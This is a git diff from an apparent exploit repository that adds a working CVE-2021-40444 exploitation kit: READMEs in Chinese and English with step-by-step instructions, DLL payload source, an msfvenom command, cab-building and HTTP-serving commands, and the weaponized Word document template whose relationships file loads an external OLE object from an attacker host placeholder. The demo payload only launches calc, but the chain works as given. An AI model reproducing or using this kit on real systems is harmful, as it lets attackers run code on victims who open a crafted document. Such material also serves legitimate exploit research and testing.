diff --git a/CVE-2018-8453/README.md b/CVE-2018-8453/README.md
index 6ca382a..62f2ea5 100644
--- a/CVE-2018-8453/README.md
+++ b/CVE-2018-8453/README.md
@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453
 
 测试系统Windows 10 1709 x64
 
-![CVE-2018-8453](https://github.com/Ascotbe/Random-img/raw/master/WindowsKernelExploits/CVE-2018-8453_win10_1709_x64.gif)
+![CVE-2018-8453](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif)
 
 #### 分析文章
 - https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453
diff --git a/CVE-2021-40444/README.md b/CVE-2021-40444/README.md
new file mode 100644
index 0000000..a7d02ce
--- /dev/null
+++ b/CVE-2021-40444/README.md
@@ -0,0 +1,124 @@
+### CVE-2021-40444
+
+#### 描述
+
+这个漏洞是IE浏览器的漏洞，但是offer相关组件默认使用的是IE浏览器，所以在offer相关组件禁用了ActiveX也一样可以执行
+
+#### 影响版本
+
+| Product             | CPU Architecture | Version | Update | Tested   |
+| ------------------- | ---------------- | ------- | ------ | -------- |
+| Windows 10          | x86/x64          |         |        |          |
+| Windows 10          | x86/x64          | 1607    |        |          |
+| Windows 10          | x86/x64/AMD64    | 1809    |        |          |
+| Windows 10          | x86/x64/AMD64    | 1909    |        |          |
+| Windows 10          | x86/x64/AMD64    | 2004    |        | ✔ |
+| Windows 10          | x86/x64/AMD64    | 20H2    |        |          |
+| Windows 10          | x86/x64/AMD64    | 21H1    |        |          |
+| Windows 7           | x86/x64          |         | SP1    |          |
+| Windows 8.1         | x86/x64          |         |        |          |
+| Windows Rt 8.1      |                  |         |        |          |
+| Windows Server 2008 | x86/x64          |         | SP2    |          |
+| Windows Server 2008 | x64              | R2      | SP1    |          |
+| Windows Server 2012 |                  |         |        |          |
+| Windows Server 2012 |                  | R2      |        |          |
+| Windows Server 2016 |                  |         |        |          |
+| Windows Server 2019 |                  |         |        |          |
+| Windows Server 2022 |                  |         |        |          |
+| Windows Server      |                  | 2004    |        |          |
+| Windows Server      |                  | 20H2    |        |          |
+
+
+
+#### 修复补丁
+
+```
+https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934
+```
+
+#### 利用原理
+
+根据之前在野利用样本`938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52`可以知道，其实就是利用默认浏览器（IE）加载ActiveX
+
+![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png)
+
+本质上恶意利用只需要修改样本中的`document.xml.rels`文件中框起来mhtml和x-usc这两段内容该为恶意目标网页，即可达到利用
+
+#### 利用方式
+
+首先需要生成一个恶意的DLL文件，通过msf或者自己编译都行
+
+- 自己编译
+
+  ```c
+  //calc.c
+  #include <windows.h>
+  
+  void exec(void) {
+  	system("cmd /c calc");
+  	return;
+  }
+  
+  BOOL WINAPI DllMain(
+      HINSTANCE hinstDLL,
+      DWORD fdwReason, 
+      LPVOID lpReserved )
+  {
+      switch( fdwReason ) 
+      { 
+          case DLL_PROCESS_ATTACH:
+             exec(); 
+             break;
+  
+          case DLL_THREAD_ATTACH:
+              break;
+  
+          case DLL_THREAD_DETACH:
+              break;
+  
+          case DLL_PROCESS_DETACH:
+              break;
+      }
+      return TRUE;
+  }
+  ```
+
+  然后运行命令
+
+  ```
+  i686-w64-mingw32-gcc -shared calc.c -o calc.dll
+  ```
+
+- 通过msf编译
+
+  ```
+  msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f dll>>calc.dll
+  ```
+
+> 最好使用MSF生成DLL文件！
+>
+> 还有请看准对应机器，有些Windows 10 版本不存在该问题
+
+安装环境所需要的依赖`sudo apt-get install lcab`，生成 cab用的
+
+接着使用一键化脚本，`test/calc.dll`这个为你生成的哪个dll所在的绝对路径，`http://you_ip`你启动exp这台机器的IP
+
+```
+cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip
+```
+
+![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png)
+
+然后启动http服务
+
+```
+cd srv ; python3 -m http.server 80
+```
+
+接着把生成的恶意docx文件（在`out/`文件夹中），放到目标机器上（Windows 10 2004 x64），即可执行成功
+
+![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif)
+
+#### 参考项目
+
+- [prcabral](https://github.com/prcabral/CVE-2021-40444)
\ No newline at end of file
diff --git a/CVE-2021-40444/REPRODUCE.md b/CVE-2021-40444/REPRODUCE.md
new file mode 100644
index 0000000..a0384db
--- /dev/null
+++ b/CVE-2021-40444/REPRODUCE.md
@@ -0,0 +1,77 @@
+# CVE-2021-40444
+
+Reproduce steps for CVE-2021-40444
+
+These reproduction steps are based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file).
+
+## Generating docx
+
+Go to `maldoc/word/_rels/document.xml.rels` and edit the two ocurrences for `http://<HOST>` with the URL to the exploit.html Eg.: `http://127.0.0.1/exploit.html` file.
+
+Generate docx:
+
+`cd maldoc/ ; zip -r maldoc.docx *`
+
+## Generating malicious cab
+
+```
+#include <windows.h>
+
+void exec(void) {
+	system("C:\\Windows\\System32\\calc.exe");
+	return;
+}
+
+BOOL WINAPI DllMain(
+    HINSTANCE hinstDLL,
+    DWORD fdwReason, 
+    LPVOID lpReserved )
+{
+    switch( fdwReason ) 
+    { 
+        case DLL_PROCESS_ATTACH:
+           exec(); 
+           break;
+
+        case DLL_THREAD_ATTACH:
+            break;
+
+        case DLL_THREAD_DETACH:
+            break;
+
+        case DLL_PROCESS_DETACH:
+            break;
+    }
+    return TRUE;
+}
+```
+
+Exec:
+
+`i686-w64-mingw32-gcc -shared calc.c -o calc.dll`
+
+Generate cab (install lcab `sudo apt-get install lcab`)
+
+`cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab`
+
+Copy out.cab into `www/` directory, modify exploit.html to point to `http://127.0.0.1/out.cab`
+  
+Execute Python script: `patch_cab.py`
+  
+Finally, setup server:
+  
+`cd www/ ; sudo python3 -m http.server 80`
+
+# End
+
+Execute now maldoc.docx in target VM
+
+If not working, make sure there is a `championship.inf` file at `C:\Users\<user>\AppData\Temp\`
+
+If file is present but DLL did not get executed, make sure you are opening docx from a folder reached from by exploit.html, like Documents, Desktop, or Downloads.
+
+# More
+
+To automatically resolve the array obfuscation on HTML file use `deobfuscate.py` (already has hardcoded the mutated array)
+
+Anyway, there is already a deobfuscated version: `deob.html`
diff --git a/CVE-2021-40444/data/word_dat/[Content_Types].xml b/CVE-2021-40444/data/word_dat/[Content_Types].xml
new file mode 100644
index 0000000..fde4e92
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/[Content_Types].xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
\ No newline at end of file
diff --git a/CVE-2021-40444/data/word_dat/_rels/.rels b/CVE-2021-40444/data/word_dat/_rels/.rels
new file mode 100644
index 0000000..32548d4
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/_rels/.rels
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
\ No newline at end of file
diff --git a/CVE-2021-40444/data/word_dat/docProps/app.xml b/CVE-2021-40444/data/word_dat/docProps/app.xml
new file mode 100644
index 0000000..961b67b
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/docProps/app.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal</Template><TotalTime>34</TotalTime><Pages>1</Pages><Words>206</Words><Characters>1176</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>9</Lines><Paragraphs>2</Paragraphs><ScaleCrop>false</ScaleCrop><Company>Consumers Association</Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>1380</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>
\ No newline at end of file
diff --git a/CVE-2021-40444/data/word_dat/docProps/core.xml b/CVE-2021-40444/data/word_dat/docProps/core.xml
new file mode 100644
index 0000000..8f3b81b
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/docProps/core.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Microsoft</dc:creator><dc:description></dc:description><cp:lastModifiedBy>user</cp:lastModifiedBy><cp:revision>6</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2013-10-31T15:25:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-31T16:47:00Z</dcterms:modified><dc:language>en-US</dc:language></cp:coreProperties>
diff --git a/CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels b/CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels
new file mode 100644
index 0000000..2631d1e
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/></Relationships>
diff --git a/CVE-2021-40444/data/word_dat/word/document.xml b/CVE-2021-40444/data/word_dat/word/document.xml
new file mode 100644
index 0000000..4f0cec5
--- /dev/null
+++ b/CVE-2021-40444/data/word_dat/word/document.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14"><w:body><w:p w14:paraId="567F7079" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:sz w:val="24"/><w:szCs w:val="24"/><w:u w:val="single"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:noProof/><w:sz w:val="24"/><w:szCs w:val="24"/><w:u w:val="single"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:drawing><wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D47C28F" wp14:editId="74FFCD40"><wp:extent cx="1714500" cy="1714500"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:docPr id="1" name="Image1"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="1" name="Image1"/><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId4"/><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="1714500" cy="1714500"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:inline></w:drawing></w:r></w:p><w:p w14:paraId="720AA3DA" w14:textId="6089DC1A" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:sz w:val="30"/><w:szCs w:val="30"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:sz w:val="30"/><w:szCs w:val="30"/><w:u w:val="single"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:sz w:val="30"/><w:szCs w:val="30"/><w:u w:val="single"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:object w:dxaOrig="4320" w:dyaOrig="4320" w14:anchorId="0457A93C"><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:3.75pt;height:3.75pt" o:ole=""><v:imagedata r:id="rId5" o:title="" cropbottom="64444f" cropright="64444f"/></v:shape><o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId6" UpdateMode="OnCall"><o:LinkType>EnhancedMetaFile</o:LinkType><o:LockedField>false</o:LockedField><o:FieldCodes>\f 0</o:FieldCodes></o:OLEObject></w:object></w:r><w:bookmarkEnd w:id="0"/></w:p><w:p w14:paraId="1D3CD07E" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:color w:val="000000"/><w:sz w:val="28"/><w:szCs w:val="28"/><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:bCs/><w:color w:val="000000"/><w:sz w:val="28"/><w:szCs w:val="28"/><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:b/><w:bCs/><w:color w:val="000000"/><w:sz w:val="28"/><w:szCs w:val="28"/><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:br/><w:t></w:t></w:r></w:p><w:p w14:paraId="411733A3" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t xml:space="preserve"></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="3224C118" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:color w:val="222222"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="47107722" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="5DB71CC8" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t> </w:t></w:r></w:p><w:p w14:paraId="54D7FECB" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t> </w:t></w:r></w:p><w:p w14:paraId="7D569F4A" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t> </w:t></w:r></w:p><w:p w14:paraId="7F29C926" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t xml:space="preserve"></w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="0116ACF9" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="5DF66ACD" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:eastAsia="en-GB"/></w:rPr><w:t> </w:t></w:r></w:p><w:p w14:paraId="516C29F7" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="3D92D8D3" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="4594E64D" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r></w:p><w:p w14:paraId="7C53F508" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:pPr><w:proofErr w:type="spellStart"/><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r><w:proofErr w:type="spellEnd"/></w:p><w:p w14:paraId="3BEC24AD" w14:textId="77777777" w:rsidR="00642844" w:rsidRDefault="007E0FA4"><w:pPr><w:pStyle w:val="BodyText"/></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr><w:t></w:t></w:r></w:p><w:sectPr w:rsidR="00642844"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="0" w:footer="0" w:gutter="0"/><w:cols w:space="720"/><w:formProt w:val="0"/><w:docGrid w:linePitch="100" w:charSpace="4096"/></w:sectPr></w:body></w:document>
\ No newline at end of file
diff --git a/CVE-2021-40444/data/word_dat/word/fontTable.xml b/CVE-2021-40444/data/word_dat/word/fontTable.xml
